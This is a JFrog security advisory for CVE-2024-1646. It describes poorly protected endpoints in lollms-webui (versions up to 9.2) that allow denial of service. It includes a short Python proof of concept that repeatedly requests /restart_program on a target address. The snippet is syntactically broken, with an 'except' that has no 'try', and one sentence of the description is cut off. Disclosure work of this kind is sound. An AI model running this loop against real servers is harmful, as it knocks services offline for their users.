JFrog Security Research
< Back

JFSA-2024-001028815 - lollms-webui exposued endpoints DoS

CVE-2024-1646 | CVSS 8.2

JFrog Severity:high

Discovered ByNaveh Racovskyof the JFrog Security Research Team

Published 15 Apr, 2024 | Last updated 15 Apr, 2024

Exposed endpoints in lollms-webui leads to denial of service


(,9.2], Fixed in 9.3

Multiple sensitive endpoints are not well-protected from access by outside actors. The current protection checks whether the host parameter isn't

if lollmsElfServer.config.host==""

However, the application may be run exposed to a specific interface, in which case this check will be insufficient.

// PoC.py
import requests
from time import sleep
IP_ADDRESS = "aaa.bbb.ccc.ddd" #Change this to the address of the chosen interface
PORT = 9600

while True:
        response = requests.get(f"http://{IP_ADDRESS}:{str(PORT)}/restart_program")
    except Exception:

No mitigations are supplied for this issue


< Back